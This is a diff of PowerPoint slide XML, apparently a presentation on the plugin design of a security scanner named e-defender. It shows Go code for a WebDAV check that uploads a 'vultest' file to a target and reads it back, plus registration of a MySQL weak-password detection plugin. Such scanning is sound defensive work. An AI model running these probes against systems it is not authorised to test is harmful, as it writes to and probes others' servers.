-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
               <a:t>func</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> </a:t>
+              <a:t> (d *</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>init</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>() {</a:t>
+              <a:t>webDav</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) Check(URL string, meta </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>plugin.TaskMeta</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) bool {</a:t>
             </a:r>
             <a:br>
               <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
@@ -9261,7 +8641,61 @@
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>plugin.Regist</a:t>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(URL)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>putURL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> := URL + "/" + </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>util.GetRandomString</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(6) + ".txt"</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   request, err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>http.NewRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("PUT", </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>putURL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>strings.NewReader</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
@@ -9269,30 +8703,448 @@
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>mysql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>", &amp;</a:t>
+              <a:t>vultest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>"))</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>mysqlWeakPass</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>{})</a:t>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
             </a:r>
             <a:br>
               <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
             </a:br>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>log.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(err)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   _, err = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>util.RequestDo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(request, false, 15)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>log.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(err)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>vRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>http.NewRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("GET", </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>putURL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, nil)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>log.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(err)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   resp, err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>util.RequestDo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>vRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, true, 15)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>log.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(err)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>strings.Contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, "</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>vultest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>") {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      result := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.info</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Response</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>resp.RequestRaw</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = append(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, result)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return true</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
               <a:t>}</a:t>
             </a:r>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
             <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -9300,7 +9152,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2395209562"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994534069"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9332,7 +9184,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F28DBC-0846-E247-A917-E72D5A120AE0}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FE0BDB-C419-7247-93CF-C74DF4D7491C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -9343,95 +9195,270 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913775" y="618518"/>
+            <a:ext cx="10364452" cy="583982"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>工程效率实践</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2">
+              <a:t>插件化</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87A4C522-7C6D-0F45-881A-F18BBFCCB300}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B0B526-043D-2B47-A559-25A0442DBE05}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1816274" y="1490597"/>
+            <a:ext cx="8880953" cy="5078313"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>e-defender</a:t>
+            </a:r>
+            <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>使用</a:t>
+              <a:t>和一个比较核心的特性就是插件化，可以支持平滑的拓展，如果有新的功能想要加入，只需要在</a:t>
             </a:r>
             <a:r>
               <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>git</a:t>
+              <a:t>plugin/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>goPlugins</a:t>
             </a:r>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>作为版本控制工具</a:t>
+              <a:t>中添加相关函数即可，新添加的这个对象只要实现了如下接口，就是一个可用的插件</a:t>
             </a:r>
             <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
           </a:p>
           <a:p>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>// </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>GoPlugin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>插件接口</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>type </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>GoPlugin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> interface {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   Init() Plugin</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   Check(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netloc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> string, meta </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>TaskMeta</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) bool</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>GetResult</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>() []Plugin</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
+              <a:t>插件</a:t>
+            </a:r>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>单测一定要补全</a:t>
+              <a:t>采用自注册的模式，这里使用了</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>go</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语言的一个语法特性，在包初始化的时候将自己注册到</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>pulgin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>树，如下是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>mysql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>弱密码检测插件自注册的代码</a:t>
             </a:r>
             <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Changelog</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>记得写</a:t>
-            </a:r>
             <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>能上</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>docker</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>就上</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>docker</a:t>
-            </a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>func</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>init</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>() {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>plugin.Regist</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>mysql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>", &amp;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>mysqlWeakPass</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>{})</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
